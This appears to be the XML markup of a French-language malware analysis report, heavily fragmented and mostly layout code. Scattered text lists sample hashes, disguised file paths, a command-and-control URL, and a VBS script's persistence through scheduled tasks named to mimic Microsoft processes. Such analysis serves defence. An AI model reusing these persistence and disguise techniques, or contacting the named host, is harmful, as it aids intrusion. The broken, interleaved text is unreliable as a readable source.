                            <a:pt x="1379855" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1767204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4571999" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4571999" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4571999" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3733799" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571364" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4571364" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3733799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3733799" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1380489" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733164" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3733164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1380489" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1380489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638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6568449</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5791200" cy="3105784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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1200" cy="31057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1200" h="3105784">
                          <a:moveTo>
                            <a:pt x="0" y="2656839"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2656839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3105784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3105784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2656839"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1049655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1049655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2657474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2657474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1049655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="889635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="889635"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1049655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1049655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="889635"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4572634" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4572634" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4572634" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3734434" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571999" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4571999" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3734434" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3734434" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1381124" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733799" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3733799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1381124" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1381124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1540519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5797550" cy="5918200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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7550" cy="5918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7550" h="5918200">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="5918200"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5915025"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5797550" y="5915025"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5031105"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="5031105"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4147185"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="4147185"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3263265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="3263265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2379345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="2379345"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1495425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="1495425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="611505"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="611505"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="579755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6624" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2280920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1546869</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5905500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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9055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905500">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="59055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8672" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4634229</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1546869</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="838203" cy="5905500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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203" cy="59055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8199" h="5905500">
                          <a:moveTo>
                            <a:pt x="838199" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="838199" y="5905500"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="59055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9696" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6691630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1540519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5918200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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918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918200">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="59182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5840" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4820919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7733039</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773430" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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43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43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772795" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772795" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77343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7888" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3195955</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8308349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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9936" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1360805</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8308349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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096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198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3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1952520" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5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Voici l’intégralité des résultats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4032" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4751705</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1593238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="679968" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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Taille (en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5056" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3303905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1680233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346156" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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15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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5531485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1680233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1137512" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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751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1ère soumission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7104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>947419</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1680233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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8128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4825365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1766593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="493378" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3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octets)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91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2153550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4ed213a38f1459bdc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01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2330080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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442186055172b97ef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1200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2330080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%APPDATA%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2224" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4669789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2425723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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146 192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3248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2425723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757711" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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71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 avril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4272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2506610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2182463" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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\systemvolumeinformation.sys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52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2506610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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08a3636a8f8bd9f95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2683140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6b469f29bc49e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73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3037470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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48eaa5ba5573dc9fb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8368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3214000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%APPDATA%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93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3214000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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ba6a25a70bd5ac816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0416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3223283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1224798" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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47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17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novembre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1440" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4669789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3309643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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135 056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24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3390530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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5377dfec02e9fe0ee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3488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3390530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2182463" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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4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\systemvolumeinformation.sys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4512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3396638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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55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3567060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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067e5efe15780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3921390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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f917143fa80ca9efa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75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4097920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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352873249a4e41dca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8608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4186185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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SystemVolumeInformation.sys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9632" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4669789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4193563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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124 666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0656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4193563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="967540" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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75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7 octobre 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16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4274450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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56bfaaa3f8c9aa912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27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4450980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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a8172849fc31c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37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4805310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8797c0d6e1d11c818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47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4981840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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dd94818c44b2b775e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5776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4981840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%APPDATA%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0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5077483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773357" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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3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6 août 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7824" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4669789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5077483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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129 184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88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5158370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5b3e1b81435f26580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9872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5158370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2182463" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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\systemvolumeinformation.sys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08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5334900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6b6cdf0e335b0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19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5689230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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12a3e81a485ae37bb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2944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5777495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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12a3e81a485ae37bb2c4c95d50cbd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39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5865760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2c4c95d50cbd41337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4992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5954025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4133751dcaeea443c40f99d200822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6016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5961403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="897271" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2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21 juillet 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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4669789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5961403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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134 658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80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6042290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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51dcaeea443c40f99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9088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6130555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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c62b17.vbs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01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6218820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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d200822c62b17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11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6573150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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072025368be824b94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21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6749680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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e01773f42554218a4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3184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6758963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1224798" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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47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29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5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décembre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4208" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2317115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6837945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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SystemVolumeInformation.sys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5232" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4669789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6845323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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132 220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62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6926210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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a10d98055ab6e7f51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7280" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5507989</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6932318</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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83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7102740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5ae60f3ae30c1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9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7718648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Ici le script commence par se copier lui-même dans le dossier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%APPDATA%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(contrairement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0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7912365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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</w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%:GTR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et </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%USERPROFILE%\boot.ini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)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, sous un nom imitant un fichier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8092070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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système, comme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24"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">SystemVolumeInf</w:t>
                        </w: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ormation.sys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. Il crée ensuite un dossier de travail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2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8293323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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caché,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%APPDATA%\VirtualStore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où il stocke plusieurs fichiers aux noms évoquant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3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8487040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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composants Windows légitimes, tels que </w:t>
                        </w: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desktop.sys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desktops.sys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contenant les deux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4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8666745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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scripts associés aux deux tâches ainsi que </w:t>
                        </w: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desktopc.ini</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="26"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> et </w:t>
                        </w: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desktopt.ini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contenant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5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8846450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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respectivement deux parties d'une URL : </w:t>
                        </w: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qyohpc.coralextensive.workers.dev</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="25"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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6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9026155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1342235" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2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O5Wv6FIfzx-07-22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9311028</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Enfin, le script met en place une persistance en créant deux tâches planifiées Windows,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8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9484383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nommées de manière à ressembler à des processus Microsoft légitimes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95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05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16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26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36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350528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4756808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2874449" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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444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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">write-off of military property of the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95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4747525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2855839" cy="163574"/>
